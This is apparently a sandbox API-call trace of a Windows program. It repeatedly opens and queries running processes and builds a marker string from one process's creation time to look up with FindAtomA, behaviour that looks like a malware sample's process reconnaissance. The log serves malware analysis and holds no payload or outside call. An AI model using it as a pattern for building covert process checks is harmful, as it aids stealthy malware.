	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0082.156] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.156] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0082.157] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.157] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.158] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.158] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.158] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.158] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.158] CloseHandle (hObject=0x3bc) returned 1
	[0082.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0082.158] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.159] CloseHandle (hObject=0x3bc) returned 1
	[0082.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0082.159] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.159] CloseHandle (hObject=0x3bc) returned 1
	[0082.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.159] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.159] CloseHandle (hObject=0x3bc) returned 1
	[0082.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.159] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.159] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.159] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.160] wsprintfA (in: param_1=0x752448, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.160] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.160] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.160] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.160] CloseHandle (hObject=0x3bc) returned 1
	[0082.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0082.161] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.161] CloseHandle (hObject=0x3bc) returned 1
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0082.228] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.228] CloseHandle (hObject=0x3bc) returned 1
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0082.228] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.228] CloseHandle (hObject=0x3bc) returned 1
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0082.228] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.228] CloseHandle (hObject=0x3bc) returned 1
	[0082.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0082.229] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.229] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0082.230] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.230] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x3bc
	[0082.231] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.231] CloseHandle (hObject=0x3bc) returned 1
	[0082.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.232] CloseHandle (hObject=0x3bc) returned 1
	[0082.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x3bc
	[0082.232] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.233] CloseHandle (hObject=0x3bc) returned 1
	[0082.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x3bc
	[0082.233] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.233] CloseHandle (hObject=0x3bc) returned 1
	[0082.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x3bc
	[0082.233] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.233] CloseHandle (hObject=0x3bc) returned 1
	[0082.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.233] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.233] CloseHandle (hObject=0x3bc) returned 1
	[0082.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x3bc
	[0082.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.234] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0082.234] GetProcessTimes (in: hProcess=0x3bc, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0082.234] wsprintfA (in: param_1=0x752448, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0082.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.234] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0082.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0082.234] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0082.234] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0082.235] CloseHandle (hObject=0x3bc) returned 1
	[0082.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0082.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0082.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x3bc
	[0082.235] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.235] CloseHandle (hObject=0x3bc) returned 1
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0082.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x3bc
	[0082.272] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.272] CloseHandle (hObject=0x3bc) returned 1
	[0082.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x3bc
	[0082.273] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.273] CloseHandle (hObject=0x3bc) returned 1
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x3bc
	[0082.273] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.273] CloseHandle (hObject=0x3bc) returned 1
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x3bc
	[0082.273] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.273] CloseHandle (hObject=0x3bc) returned 1
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x3bc
	[0082.273] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.273] CloseHandle (hObject=0x3bc) returned 1
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x3bc
	[0082.273] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.273] CloseHandle (hObject=0x3bc) returned 1
	[0082.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.274] CloseHandle (hObject=0x3bc) returned 1
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.274] CloseHandle (hObject=0x3bc) returned 1
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.274] CloseHandle (hObject=0x3bc) returned 1
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.274] CloseHandle (hObject=0x3bc) returned 1
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.274] CloseHandle (hObject=0x3bc) returned 1
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0082.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x3bc
	[0082.274] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.275] CloseHandle (hObject=0x3bc) returned 1
	[0082.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x3bc
	[0082.275] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0082.276] CloseHandle (hObject=0x3bc) returned 1
	[0082.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x3bc
	[0082.276] IsWow64Process (in: hProcess=0x3bc, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
